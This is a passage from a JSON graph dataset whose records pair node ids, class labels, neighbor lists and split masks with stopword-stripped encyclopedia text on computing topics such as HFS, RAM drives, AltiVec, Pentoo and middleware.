    "text": "World_Spider_Catalog:world spider catalog world spider catalog wsc online searchable database concerned spider taxonomy aims list accepted families genera species well provide access related taxonomic literature wsc began series individual web pages 2000 created norman i. platnick american museum natural history platnick retirement 2014 natural history museum bern switzerland took catalog converting relational database 48,265 accepted species listed order araneae spiders seventh-largest number species orders existence world spider catalog makes spiders largest taxon online listing updated regularly described exhaustive resource promoted rigorous scholarship amplified productivity taxonomy spiders",
    "neighbors": [
      2901,
      9286
    ],
    "mask": "Test"
  },
  {
    "node_id": 8112,
    "label": 2,
    "text": "Usplash:usplash usplash software project ubuntu community historically scrolling text verbose mode typically appeared linux computers boot usplash replaces scrolling-text screens graphical splash screen designed replace bootsplash thing kernel space level since usplash operates user space updated without recompiling kernel usplash uses linux framebuffer interface alternatively direct vesa access display splash screen ubuntu 9.10 karmic koala usplash used preliminary stages booting xsplash takes ubuntu 10.04 lts lucid lynx usplash fully replaced plymouth uses direct rendering manager drm kms driver",
    "neighbors": [
      11669,
      3478,
      8476,
      926,
      10016,
      5410,
      3245,
      6445,
      439,
      823,
      10687,
      3654,
      5962,
      975,
      7375,
      1107,
      4951,
      3033,
      3550,
      5343,
      4192,
      6625,
      7140,
      5990,
      7913,
      7020,
      9324,
      11631,
      8177,
      2930,
      9971,
      1396,
      3189,
      5369,
      5755,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8113,
    "label": 9,
    "text": "APMonitor:apmonitor advanced process monitor apmonitor modeling language differential algebraic dae equations free web-service local server solving representations physical systems form implicit dae models apmonitor suited large-scale problems solves linear programming integer programming nonlinear programming nonlinear mixed integer programming dynamic simulation moving horizon estimation nonlinear model predictive control apmonitor solve problems directly calls nonlinear programming solvers apopt bpopt ipopt minos snopt apmonitor api provides exact first second derivatives continuous functions solvers automatic differentiation sparse matrix form julia matlab python mathematical programming languages apmonitor integration web-service apis gekko optimization suite recent extension apmonitor complete python integration interfaces built-in optimization toolboxes modules load process solutions optimization problems apmonitor object-oriented modeling language optimization suite relies programming languages load run retrieve solutions apmonitor models data compiled run-time translated objects solved optimization engine apopt ipopt optimization engine specified apmonitor allowing several different optimization engines switched simulation optimization mode also configurable reconfigure model dynamic simulation nonlinear model predictive control moving horizon estimation general problems mathematical optimization first step solving problem mathematical model expressed terms variables equations hock schittkowski benchmark problem 71 used test performance nonlinear programming solvers particular optimization problem objective function formula_1 subject inequality constraint formula_2 equality constraint formula_3 four variables must lower bound 1 upper bound 5 initial guess values formula_4 mathematical model translated apmonitor modeling language following text file problem solved python first installing apmonitor package pip install apmonitor following python code installing python required module apmonitor package installed imported apm_solve function solves optimization problem solution returned programming language processing analysis similar interfaces available matlab julia minor differences syntax extending capability modeling language important significant pre- post-processing data solutions often required solving complex optimization dynamic simulation estimation control problems highest order derivative necessary return dae ode form called differentiation index standard way dealing high-index daes differentiate equations put index-1 dae ode form see pantelides algorithm however approach cause number undesirable numerical issues instability syntax similar modeling languages gproms apmonitor solves daes index without rearrangement differentiation example index-3 dae shown pendulum motion equations lower index rearrangements return system equations ode form see index 0 3 pendulum example many physical systems naturally expressed differential algebraic equation include models direct current dc motor blood glucose response insulin dependent patient listed representative differential algebraic equations encountered many branches science engineering",
    "neighbors": [
      9376,
      5830,
      329,
      7593,
      587,
      5612,
      8554,
      3567,
      1039,
      7983,
      4019,
      9431,
      7326,
      9915,
      6718
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8114,
    "label": 6,
    "text": "Hierarchical_File_System:hierarchical file system hierarchical file system hfs proprietary file system developed apple inc. use computer systems running mac os originally designed use floppy hard disks also found read-only media cd-roms hfs also referred mac os standard hfs standard successor hfs plus also called mac os extended hfs extended introduction mac os x 10.6 apple dropped support formatting writing hfs disks images remain supported read-only volumes starting macos 10.15 hfs disks longer read apple introduced hfs september 1985 specifically support apple first hard disk drive macintosh replacing macintosh file system mfs original file system introduced year half earlier first macintosh computer hfs drew heavily upon apple first hierarchical operating system sos failed apple iii also served basis hierarchical file systems apple iie apple lisa hfs developed patrick dirks bill bruffey shared number design features mfs available file systems time dos fat files could multiple forks normally data resource fork allowed main data file stored separately resources icons might need localized files referenced unique file ids rather file names file names could 255 characters long although finder supported maximum 31 characters however mfs optimized used small slow media namely floppy disks hfs introduced overcome performance problems arrived introduction larger media notably hard drives main concern time needed display contents folder mfs file directory listing information stored single file system search build list files stored particular folder worked well system hundred kilobytes storage perhaps hundred files systems grew megabytes thousands files performance degraded rapidly solution replace mfs directory structure one suitable larger file systems hfs replaced flat table structure catalog file uses b-tree structure could searched quickly regardless size hfs also redesigned various structures able hold larger numbers 16-bit integers replaced 32-bit almost universally oddly one places upsizing take place file directory limits hfs total 65,535 files logical disk hfs proprietary file system format well-documented usually solutions available access hfs-formatted disks modern operating systems apple introduced hfs necessity first 20 mb hard disk offering macintosh september 1985 loaded ram mfs floppy disk boot using patch file hard disk 20 however hfs widely introduced included 128k rom debuted macintosh plus january 1986 along larger 800 kb floppy disk drive macintosh also used hfs introduction hfs first advancement apple leave macintosh computer model behind original 128k macintosh lacked sufficient memory load hfs code promptly discontinued 1998 apple introduced hfs plus address inefficient allocation disk space hfs add improvements hfs still supported current versions mac os starting mac os x hfs volume used booting beginning mac os x 10.6 snow leopard hfs volumes read-only created updated macos sierra 10.12 apple release notes state hfs standard filesystem longer supported however read-only hfs standard support still present sierra works previous versions storage volume inherently divided logical blocks 512 bytes hierarchical file system groups logical blocks allocation blocks contain one logical blocks depending total size volume hfs uses 16-bit value address allocation blocks limiting number allocation blocks 65,535 2-1 five structures make hfs volume catalog file stores file directory records single data structure results performance problems system allows multitasking one program write structure time meaning many programs may waiting queue due one program hogging system also serious reliability concern damage file destroy entire file system contrasts file systems store file directory records separate structures dos fat file system unix file system structure distributed across disk means damaging single directory generally non-fatal data may possibly re-constructed data held non-damaged portions additionally limit 65,535 allocation blocks resulted files minimum size equivalent 1/65,535th size disk thus given volume matter size could store maximum 65,535 files moreover file would allocated space actually needed allocation block size disks small little consequence individual allocation block size trivial disks started approach 1 gb mark smallest amount space file could occupy single allocation block became excessively large wasting significant amounts disk space example 1 gb disk allocation block size hfs 16 kb even 1 byte file would take 16 kb disk space situation less problem users large files pictures databases audio larger files wasted less space percentage file size users many small files hand could lose copious amount space due large allocation block size made partitioning disks smaller logical volumes appealing mac users small documents stored smaller volume would take much less space resided large partition problem existed fat16 file system hfs saves case file created renamed case-insensitive operation",
    "neighbors": [
      5120,
      2564,
      1542,
      6669,
      3598,
      10257,
      4114,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      5158,
      7720,
      1592,
      7225,
      11323,
      8254,
      576,
      8772,
      1109,
      9308,
      3167,
      10851,
      4708,
      10857,
      9836,
      7789,
      5743,
      6771,
      4724,
      9333,
      6263,
      2168,
      9335,
      9848,
      9343,
      8832,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      8857,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      3257,
      1212,
      8380,
      3265,
      4804,
      7163,
      10951,
      713,
      9420,
      7378,
      3795,
      4819,
      213,
      8402,
      8404,
      728,
      8410,
      6365,
      9953,
      739,
      7907,
      4841,
      6377,
      8938,
      4844,
      10476,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2811,
      3324,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      3859,
      6935,
      11033,
      11037,
      287,
      1825,
      6434,
      4387,
      5413,
      3368,
      2345,
      4907,
      9004,
      302,
      4910,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      10052,
      3909,
      2378,
      9035,
      10570,
      4431,
      5969,
      6995,
      346,
      2395,
      8540,
      2397,
      10596,
      2407,
      10087,
      5482,
      11638,
      6519,
      376,
      11128,
      890,
      10623,
      7554,
      8075,
      7053,
      7565,
      5520,
      6545,
      5013,
      6037,
      11675,
      11676,
      414,
      2974,
      6048,
      7070,
      11171,
      10151,
      4012,
      1454,
      6062,
      11184,
      7603,
      8115,
      8631,
      1464,
      1978,
      5565,
      8643,
      10691,
      7126,
      2015,
      9700,
      1509,
      9189,
      7663,
      5619,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8115,
    "label": 6,
    "text": "RAM_drive:ram drive ram drive also called ram disk block random-access memory primary storage volatile memory computer software treating memory disk drive secondary storage sometimes referred virtual ram drive software ram drive distinguish hardware ram drive uses separate hardware containing ram type battery-backed solid-state drive performance ram drive general orders magnitude faster forms storage media ssd hard drive tape drive optical drive performance gain due multiple factors including access time maximum throughput type file system file access time greatly reduced since ram drive solid state mechanical parts physical hard drive optical media cd-rom dvd blu-ray must move head optical eye position tape drives must wind rewind particular position media reading writing occur ram drives access data memory address given file movement alignment positioning necessary second maximum throughput ram drive limited speed ram data bus cpu computer forms storage media limited speed storage bus ide pata sata usb firewire compounding limitation speed actual mechanics drive motors heads eyes third file system use ntfs hfs ufs ext2 etc. uses extra accesses reads writes drive although small add quickly especially event many small files vs. larger files temporary internet folders web caches etc. storage ram volatile memory means lost event power loss whether intentional computer reboot shutdown accidental power failure system crash general weakness data must periodically backed persistent-storage medium avoid loss sometimes desirable example working decrypted copy encrypted file many cases data stored ram drive created data permanently stored elsewhere faster access re-created ram drive system reboots apart risk data loss major limitation ram drives limited capacity constrained amount ram within machine multi-terabyte-capacity persistent storage become commoditized 2012 whereas ram still measured gigabytes ram drives use normal ram main memory partition hard drive rather actually accessing data bus normally used secondary storage though ram drives often supported directly operating system via special mechanisms operating system kernel possible also create manage ram drive application usually battery backup needed due temporary nature information stored ram drive uninterrupted power supply keep entire system running power outage necessary ram drives use compressed file system cramfs allow compressed data accessed fly without decompressing first convenient ram drives often small due higher price per byte conventional hard drive storage first software ram drive microcomputers invented written jerry karlin uk 1979/80 software known silicon disk system developed commercial product marketed jk systems research became microcosm research ltd company joined peter cheesewright microcosm ltd idea enable early microcomputers use ram cpu could directly address making bank-switched ram behave like disk drive much faster disk drives especially days hard drives readily available machines silicon disk launched 1980 initially cp/m operating system later ms-dos due limitations memory addressing apple ii series commodore computers ram drive also popular application commodore 64 commodore 128 systems ram expansion units apple ii series computers 64kb ram apple computer supported software ram drive natively prodos systems 128kb ram prodos would automatically allocate ram drive named /ram ibm added ram drive named vdisk.sys pc dos version 3.0 august 1984 first dos component use extended memory vdisk.sys available microsoft ms-dos unlike components early versions pc dos written ibm microsoft included similar program ramdrive.sys ms-dos 3.2 released 1986 could also use expanded memory discontinued windows 7 dr-dos dr family multi-user operating systems also came ram disk named vdisk.sys multiuser dos ram disk defaults drive letter memory drive amigaos built ram drive since release version 1.1 1985 still amigaos 4.1 2010 apple computer added functionality apple macintosh system 7 memory control panel 1991 kept feature life mac os 9 mac os x users use hdid newfs newfs hfs mount utilities create format mount ram drive ram drive innovation introduced 1986 made generally available 1987 perry kivolowitz amigaos ability ram drive survive crashes reboots called asdg recoverable ram disk device survived reboots allocating memory dynamically reverse order default memory allocation feature supported underlying os reduce memory fragmentation super-block written unique signature could located memory upon reboot super-block rrd disk blocks maintained check sums enable invalidation disk corruption detected first asdg rrd locked asdg memory boards used selling feature later asdg rrd made available shareware carrying suggested donation 10 dollars shareware version appeared fred fish disks 58 241 amigaos would gain recoverable ram disk called rad version 1.3 many unix unix-like systems provide form ram drive functionality /dev/ram linux md 4 freebsd ram drives particularly useful high-performance low-resource applications unix-like operating systems sometimes configured also specialized ultra-lightweight linux distributions designed boot removable media stored ramdisk entire session ram drives use dram memory exclusively dedicated function extremely low latency storage device memory isolated processor directly accessible manner normal system memory 2002 cenatek produced rocket drive max 4gb four dimm slots pc133 memory maximum 4 gigabytes storage time common desktop computers used 64 128 megabytes pc100 pc133 memory 1 gigabyte pc133 modules largest available time cost approximately 1300 fully outfitted rocket drive 4 gb storage would cost 5600 2005 gigabyte technology produced i-ram max 4gb functioned essentially identical rocket drive except upgraded use newer ddr memory technology though also limited maximum 4gb capacity devices dynamic ram requires continuous power retain data power lost data fades away rocket drive connector external power supply separate computer option external battery retain data power failure i-ram included small battery directly expansion board 10-16 hours protection devices used sata 1.0 interface transfer data dedicated ram drive system sata interface slow bottleneck limited maximum performance ram drives drives still provided exceptionally low data access latency high sustained transfer speeds compared mechanical hard drives 2006 gigabyte technology produced gc-ramdisk max 8gb 2nd generation creation i-ram maximum 8gb capacity twice i-ram used sata-ii port twice i-ram one best selling points could boot ram drive use needed 2007 acard technology produced ans-9010 serial ata ram disk max 64gb quote tech report ans-9010 eight ddr2 dimm slots support 8gb memory per slot ans-9010 also features pair serial ata ports allowing function single drive masquerade pair drives easily split even faster raid 0 array 2009 acard technology produced acard ans-9010ba 5.25 dynamic ssd sata-ii ram disk max 64gb uses single sata-ii port 2014 ddrdrive llc produced ddrdrive x1 claims fastest solid state drive world drive primary 4gb ddr dedicated ram drive regular use backup recall 4gb slc nand drive intended market keeping recording log files power loss data saved internal 4gb ssd 60 seconds via use battery backup thereafter data recovered back ram power restored host power loss triggers ddrdrive x1 backup volatile data on-board non-volatile storage pros cons",
    "neighbors": [
      8832,
      11137,
      2055,
      139,
      1038,
      5391,
      5264,
      2193,
      9236,
      2197,
      5397,
      7317,
      2201,
      11550,
      671,
      3233,
      9249,
      2339,
      2723,
      4387,
      9762,
      8618,
      6062,
      432,
      6321,
      178,
      8114,
      8369,
      9983,
      823,
      4409,
      6075,
      8767,
      451,
      4548,
      11076,
      10570,
      5709,
      1742,
      2383,
      5840,
      9166,
      850,
      6995,
      4564,
      6233,
      9437,
      9693,
      3167,
      5729,
      7907,
      5736,
      6377,
      8938,
      11370,
      5743,
      1776,
      7920,
      11123,
      5492,
      9848,
      3323,
      1150,
      4735
    ],
    "mask": "Test"
  },
  {
    "node_id": 8116,
    "label": 9,
    "text": "Functional_reactive_programming:functional reactive programming functional reactive programming frp programming paradigm reactive programming asynchronous dataflow programming using building blocks functional programming e.g map reduce filter frp used programming graphical user interfaces guis robotics games music aiming simplify problems explicitly modeling time original formulation functional reactive programming found icfp 97 paper functional reactive animation conal elliott paul hudak frp taken many forms since introduction 1997 one axis diversity discrete vs. continuous semantics another axis frp systems changed dynamically earliest formulation frp used continuous semantics aiming abstract many operational details important meaning program key properties formulation semantic model frp side-effect free languages typically terms continuous functions typically time formulations event-driven frp elm version 0.17 require updates discrete event-driven formulations pushed practical frp focusing semantics simple api implemented efficiently setting robotics web-browser formulations common ideas behaviors events combined signals always current value change discretely pointed ordinary frp model inputs outputs poorly suited interactive programs lacking ability run programs within mapping inputs outputs may mean one following solutions used two types frp systems push-based pull-based push-based systems take events push signal network achieve result pull-based systems wait result demanded work backwards network retrieve value demanded frp systems yampa use sampling samples pulled signal network approach drawback network wait duration one computation step find changes input sampling example pull-based frp reactive etage libraries hackage introduced approach called push-pull frp combines best push-based pull-based frp approach next event purely defined stream list fixed events times demanded event constructed purely defined streams act like lazy lists haskell pull-based half push-based half used events external system brought external events pushed consumers find event instant issued functional reactive programming used create mobile applications android ios",
    "neighbors": [
      4417,
      4578,
      9345,
      228,
      3876,
      3462,
      2666,
      5917,
      10571,
      219,
      3823,
      10480,
      3705,
      1051,
      508,
      2557,
      7262
    ],
    "mask": "Test"
  },
  {
    "node_id": 8117,
    "label": 7,
    "text": "Airtable:airtable airtable cloud collaboration service headquartered san francisco founded 2012 howie liu andrew ofstad emmett nicholas airtable spreadsheet-database hybrid features database applied spreadsheet fields airtable table similar cells spreadsheet types 'checkbox 'phone number 'drop-down list reference file attachments like images users create database set column types add records link tables one another collaborate sort records publish views external websites airtable six basic components avoid need form single large table related data multiple tables airtables provides option link records different tables airtable allows linking existing tables related records creating new linked table also multiple links existing tables airtable allows multiple users work simultaneously base allowing productivity workplace new collaborator added clicking share button found top base providing email id collaborator owner set permission level collaborator sharing base three permission levels airtable base namely creator edit read multiple bases required team formed airtable airtable team hold multiple bases collaborators team work available bases team four permission levels team unlike base three extra permission level team owner full access team base bases easily shared public one need airtable account view published bases view bases shared public called airtable views views embedded one website allows website users see real time information base without needing airtable account one possible use-case airtable form used take survey product feedback received customer also shown public sharing airtable view airtable introduced forms july 2015 forms could used collect data others like co-workers customers public form easily created existing base data collected form automatically organized airtable base airtable allows user organize required fields form separate link created every airtable form link shared others get required data airtable form also embedded website get feedback website users airtable api used connect web services information exchanged external web applications airtable using zapier platform airtable connect 450 applications websites changes set triggers actions connected applications airtable provides greater sophistication backup data allow users undo/redo airtable periodically snapshots base previous version base needed appropriate snapshot selected user snapshots list addition user manually snapshot base time airtable introduced version 2.0 ios application december 2015 allowing users work tables iphone airtable android also available airtable provides api provide ability users build application solutions fitting exact problems key present overview section necessary use airtable api key kept secret api follows rest semantics uses json encode objects uses standard http codes signal operation outcomes initially user create base airtable airtable api used create read update delete records i.e crud 2016 airtable api allow users create modify base schema airtable uses 256 bit advanced encryption standard aes protect data also uses 256-bit ssl/tls encryption data transit",
    "neighbors": [
      10145,
      4393,
      7533,
      5202,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8118,
    "label": 8,
    "text": "WordWeb:wordweb wordweb international english dictionary thesaurus program microsoft windows ios android mac os x available download online program partly based wordnet database program activated holding ctrl right-clicking word almost program opens wordweb main window definitions help program usually resides tray thesaurus integrated dictionary synonyms well detailed categorization relationship words shown definition program shows users also actively improve dictionary thesaurus submitting errors missing words/phrases/senses enhancement requests program two versions free version word list search anagram customization features paid version called 'wordweb pro wordweb 5 added ability list entries three web sources wikipedia wiktionary wordweb online details presented three separate tabs built client application version 6 added audio pronunciations support third-party oxford chambers add-on dictionaries wordweb 7 mainly content upgrade revised definition sound database also significantly updated one-click support latest browsers 64-bit programs changes version include 1 new revised definitions related words 2 updated audio pronunciations 3 improved one-click integration programs 4 better one-click 64-bit windows 8 program support 5 keyboard hotkeys bookmark menu items 6 auto-detect support latest 3-rd party concise oxford merriam-webster wordweb 7 requires windows windows xp windows vista windows 7 windows 8 windows 10 desktop wordweb 8 includes one-click keyboard lookup including thunderbird firefox without plugin support windows xp dropped version wordweb including pro available unix however used wine similar program includes wordweb pro features artha available linux windows port macintosh promised artha based wordnet database use free version subject license terms however might used educational institution free cost students even violate said terms wordweb regionalized specific dictionaries australian british canadian american irish new zealand south african indian english",
    "neighbors": [
      416,
      1632,
      6797,
      7983,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 8119,
    "label": 4,
    "text": "Pentoo:pentoo pentoo live cd live usb designed penetration testing security assessment based gentoo linux pentoo provided 32 64 bit installable live cd pentoo also available overlay existing gentoo installation features packet injection patched wifi drivers gpgpu cracking software lots tools penetration testing security assessment pentoo kernel includes grsecurity pax hardening extra patches binaries compiled hardened toolchain latest nightly versions tools available tools installed versioned ebuilds open-ended ebuilds making possible pull latest subversions still installs tracked package management following tool categories included pentoo uses rolling releases periodic iso snapshots latest committed updates",
    "neighbors": [
      10016,
      6371,
      5284,
      5380,
      4775,
      4841,
      5067,
      3147,
      5356,
      7794,
      5363,
      5397,
      7989,
      7228,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8120,
    "label": 3,
    "text": "AltiVec:altivec altivec single-precision floating point integer simd instruction set designed owned apple ibm freescale semiconductor formerly motorola semiconductor products sector — aim alliance implemented versions powerpc processor architecture including motorola g4 ibm g5 power6 processors p.a semi pwrficient pa6t altivec trademark owned solely freescale system also referred velocity engine apple vmx vector multimedia extension ibm p.a semi altivec refers instruction set implementations cpus produced ibm motorola separate terms logic design date ibm core included altivec logic design licensed motorola vice versa altivec standard part power isa v.2.03 specification never formally part powerpc architecture specification although used powerpc instruction formats syntax occupied opcode space expressly allocated purposes vmx/altivec sse feature 128-bit vector registers represent sixteen 8-bit signed unsigned chars eight 16-bit signed unsigned shorts four 32-bit ints four 32-bit floating point variables provide cache-control instructions intended minimize cache pollution working streams data also exhibit important differences unlike sse2 vmx/altivec supports special rgb pixel data type operate 64-bit double precision floats way move data directly scalar vector registers keeping load/store model powerpc risc design vector registers like scalar registers loaded stored memory however vmx/altivec provides much complete set horizontal operations work across elements vector allowable combinations data type operations much complete thirty-two 128-bit vector registers provided compared eight sse sse2 extended 16 x86-64 vmx/altivec instructions take three register operands compared two register/register register/memory operands ia-32 vmx/altivec also unique support flexible vector permute instruction byte resulting vector value taken byte either two vectors parametrized yet another vector allows sophisticated manipulations single instruction recent versions gnu compiler collection gcc ibm visualage compiler compilers provide intrinsics access vmx/altivec instructions directly c c++ programs version 4 gcc also includes auto-vectorization capabilities attempt intelligently create vmx/altivec accelerated binaries without need programmer use intrinsics directly vector type keyword introduced permit declaration native vector types e.g. codice_1 declares 128-bit vector variable named foo containing sixteen 8-bit unsigned chars full complement arithmetic binary operators defined vector types normal c expression language used manipulate vector variables also overloaded intrinsic functions codice_2 emit appropriate op code based type elements within vector strong type checking enforced contrast intel-defined data types ia-32 simd registers declare size vector register 128 64 bits case 128-bit register whether contains integers floating point values programmer must select appropriate intrinsic data types use e.g. codice_3 adding two vectors containing eight 16-bit integers power vector media extension vmx developed 1996 1998 collaborative project apple ibm motorola apple primary customer power vector media extension vmx apple switched intel-made x86-based cpus june 6 2005 used accelerate multimedia applications quicktime itunes key parts apple mac os x including quartz graphics compositor companies adobe used altivec optimize image-processing programs adobe photoshop motorola first supply altivec enabled processors starting g4 line altivec also used embedded systems high-performance digital signal processing ibm consistently left vmx earlier power microprocessors intended server applications useful power6 microprocessor introduced 2007 implements altivec last desktop microprocessor ibm powerpc 970 dubbed g5 apple also implemented altivec hardware similar powerpc 7400 altivec brandname trademarked freescale previously motorola standard category vector part power isa v.2.03 specification category also known vmx used ibm velocity engine brand name previously used apple cell broadband engine used amongst things playstation 3 also supports power vector media extension vmx ppu spu isa enhanced architecturally similar freescale bringing enhanced version altivec e6500 based qoriq processors ibm enhanced vmx use xenon xbox 360 called enhancement vmx128 enhancements comprise new routines targeted gaming accelerating 3d graphics game physics total 128 registers vmx128 entirely compatible vmx/altivec number integer operations removed make space larger register file additional application-specific operations power isa v2.06 introduces new vsx vector-scalar instructions extend simd processing power isa support 64 registers support regular floating point decimal floating point vector execution power7 first power isa processor implement power isa v2.06 new instructions introduced ibm vector media extension category integer operations part vsx extension power isa 2.07 new integer vector instructions introduced ibm following vmx encodings part vsx extension power isa v3.0 shall introduced power9 processors c++ standard way accessing altivec support mutually exclusive use standard template library codice_4 class template due treatment vector reserved word compiler implement context sensitive keyword version vector however may possible combine using compiler-specific workarounds instance gcc one may codice_5 remove codice_6 keyword use gcc-specific codice_7 keyword place following processors altivec vmx vmx128 included",
    "neighbors": [
      6663,
      5642,
      1548,
      528,
      1042,
      1563,
      2088,
      6715,
      1085,
      7234,
      3142,
      6738,
      9302,
      8795,
      5725,
      2655,
      1122,
      1635,
      7783,
      3185,
      4211,
      2676,
      5235,
      643,
      4743,
      4237,
      9369,
      8860,
      1181,
      6311,
      9391,
      5297,
      9911,
      11449,
      1725,
      5326,
      5844,
      9428,
      731,
      6878,
      8931,
      9445,
      8937,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      1784,
      9976,
      3323,
      8700,
      6909,
      9472,
      6914,
      4868,
      2821,
      1798,
      3846,
      5380,
      10501,
      6924,
      4881,
      9500,
      1309,
      6949,
      1321,
      10543,
      306,
      8506,
      9020,
      833,
      9541,
      336,
      8530,
      6995,
      342,
      859,
      11613,
      869,
      9582,
      6004,
      1399,
      8058,
      10620,
      4491,
      1933,
      3472,
      6038,
      7065,
      3493,
      8102,
      9126,
      4017,
      6072,
      8125,
      8126,
      1983,
      1985,
      10180,
      977,
      2514,
      3025,
      3540,
      10214,
      8680,
      4587,
      10734,
      499,
      4603,
      508,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8121,
    "label": 4,
    "text": "OmniPeek:omnipeek omnipeek packet analyzer software tool savvius liveaction company network troubleshooting protocol analysis supports application programming interface api plugins savvius formerly wildpackets founded 1990 ag group mahboud zabetian tim mccreery soon changed name wildpackets first product savvius written mac called etherpeek protocol analyzer ethernet networks later ported microsoft windows released 1997 2001 airopeek released added support wireless ieee 802.11 marketed wi-fi brand networks 2003 omniengine distributed capture engine released software hardware network recorder appliance morning july 15 2002 savvius building walnut creek california burnt ground however company survived fire mid-april 2015 company changed name wildpackets savvius broadened focus include network security june 2018 savvius acquired liveaction company provides network performance management visualization analytics software savvius acquired net3 group november 2000 product netsense expert system network troubleshooting converted plug-in integrated new version product called etherpeeknx savvius acquired optimized engineering corporation 2001 optimized network analysis training courses instructors added savvius services omnipeek apis front-end automation back-end analysis well mechanisms extend enhance program 40 plug-ins available omnipeek platform plug-ins range logging extensions full-blown applications hosted omnipeek remote adapters provide means capture packets stats remote adapters capture rmon netflow sflow cisco ap aruba ap linux boxes adapters available aggregate packets multiple network segments wireless channels time notable decoders protospecs decoder files interpreted text files extended user enhance display analysis existing protocols add knowledge completely new protocols without releasing new versions application plugin wizards omnipeek console omniengine microsoft visual studio project templates generate working plug-ins wizard run dialog appears providing options types functionality sample code generated wizard complete user left working plugin entry points adding application logic plug-in wizards enable development extensions omnipeek mypeek community portal website dedicated extension omnipeek provides plug-ins scripts adapters tools various levels support plug-ins posted expertise interested extending omnipeek placemap freely available standalone google maps packet sniffer application windows captures network traffic maps nodes google map placemap notable example extensibility uses exactly google map plugin also available omnipeek uses peek driver api capture packets",
    "neighbors": [
      9440,
      10788,
      10341,
      1064,
      842,
      906,
      6797,
      7983,
      6834,
      2292,
      2006,
      823,
      2430
    ],
    "mask": "None"
  },
  {
    "node_id": 8122,
    "label": 7,
    "text": "Middleware:middleware middleware computer software provides services software applications beyond available operating system described software glue middleware makes easier software developers implement communication input/output focus specific purpose application gained popularity 1980s solution problem link newer applications older legacy systems although term use since 1968 term commonly used software enables communication management data distributed applications ietf workshop 2000 defined middleware services found transport i.e tcp/ip layer set services application environment i.e application-level apis specific sense middleware described dash client-server -to- peer-to-peer middleware includes web servers application servers content management systems similar tools support application development delivery objectweb defines middleware software layer lies operating system applications side distributed computing system network services regarded middleware include enterprise application integration data integration message oriented middleware mom object request brokers orbs enterprise service bus esb database access services often characterised middleware language specific implementations support heterogeneous features related communication features examples database-oriented middleware include odbc jdbc transaction processing monitors distributed computing system middleware loosely divided two categories—those provide human-time services web request servicing perform machine-time latter middleware somewhat standardized service availability forum commonly used complex embedded systems within telecom defense aerospace industries term middleware used contexts well middleware sometimes used similar sense software driver abstraction layer hides detail hardware devices software application",
    "neighbors": [
      10242,
      9224,
      3086,
      5658,
      9252,
      9766,
      5677,
      8751,
      3130,
      2116,
      3141,
      8262,
      3664,
      9297,
      9301,
      3158,
      8280,
      11359,
      7780,
      9828,
      105,
      113,
      3698,
      9844,
      119,
      5245,
      1663,
      4225,
      9345,
      11393,
      7812,
      10373,
      8326,
      2183,
      5772,
      5774,
      10909,
      5283,
      1702,
      1703,
      8870,
      3753,
      198,
      9926,
      4809,
      9932,
      206,
      5840,
      8912,
      6354,
      11474,
      731,
      11487,
      225,
      8940,
      2804,
      2293,
      2294,
      247,
      5880,
      249,
      6900,
      3323,
      11515,
      5373,
      10494,
      1280,
      3331,
      7427,
      8965,
      6406,
      1801,
      2826,
      8970,
      1808,
      11025,
      11027,
      11541,
      5914,
      5404,
      11039,
      10020,
      4391,
      3881,
      2346,
      7983,
      3379,
      823,
      10553,
      5956,
      11084,
      6483,
      2901,
      2394,
      1890,
      5989,
      7018,
      3949,
      1916,
      3966,
      10622,
      11134,
      2435,
      4996,
      11658,
      11661,
      10646,
      1952,
      10658,
      7588,
      5029,
      8100,
      1449,
      939,
      4020,
      4024,
      1467,
      7100,
      10686,
      8640,
      1480,
      3529,
      5585,
      4052,
      9688,
      5083,
      6108,
      9691,
      5609,
      4587,
      9710,
      7664,
      1521,
      9714,
      6131,
      10226,
      8185,
      5627,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8123,
    "label": 7,
    "text": "VDIworks:vdiworks vdiworks american software company founded 2008 provides services like desktop virtualization desktop service daas networking pcoip cloud computing vdiworks built first pcoip broker connection industry ’ pcoip broker quad broking support vdiworks vdi technology service comes full physical management vdiworks helps virtual desktops new high-speed connection protocol vdiworks inc. started services 2008 like virtual desktop enablement management software offers fast remote desktop bring power windows ipad run microsoft office well access spreadsheets power point presentations pc documents travelling videooverip remoting protocol virtual desktops deliver multimedia performance multi-monitor capabilities allowing capitalize management improvements security enhancements lowered-tco result virtualization company provides virtual desktop platform vdp virtual desktop infrastructure management system combines connection brokering vm management health alerting inventory physical management support various remoting protocols vdivision system center operations manager 2007 combine power vdiworks virtual desktop platform ubiquity datacenter management capabilities system center addition vdiworks inc. introduced vdiworks2go extension vdiworks vdp console allows mobile users check virtual machine compute go even connected network protocol inspector discover report remoting capabilities vms hosts network company provides cloud computing desktop virtualization remote access systems management technologies vdiworks inc. offers software education healthcare financial services small-medium-sized business enterprise markets vdiworks inc. prior subsidiary clearcube technology inc. vdiworks received best emerging virtualization company award multiple times crn contribution commitment towards virtualization innovation awareness vdiworks virtual desktop platform vdi management suite connection brokering remoting protocol centralized management desktop security virtual desktop healthcare aggregates user environment servers replacing pcs hardy completely secure thin clients virtual desktops vdi represent next evolution healthcare pc vdiworks made remote access possible educational power virtualization removed limitations location single desktop dependency user access information whether class room restaurant home travelling",
    "neighbors": [
      8466,
      4194,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8124,
    "label": 3,
    "text": "GeeXboX:geexbox geexbox free linux distribution providing media center software suite personal computers geexbox 2.0 later uses xbmc media playback implemented live usb live cd options system need permanently installed hard drive modern operating systems would instead computer booted geexbox cd media playback desired reasonable approach need media playback services performing tasks computer users wish repurpose older computers media centers seeking free alternative windows xp media center edition unofficial port geexbox 1.x also runs wii geexbox 1.x versions also came utility called iso-generator allowed user customize geexbox discs following options configurable via",
    "neighbors": [
      1674,
      6797,
      11283,
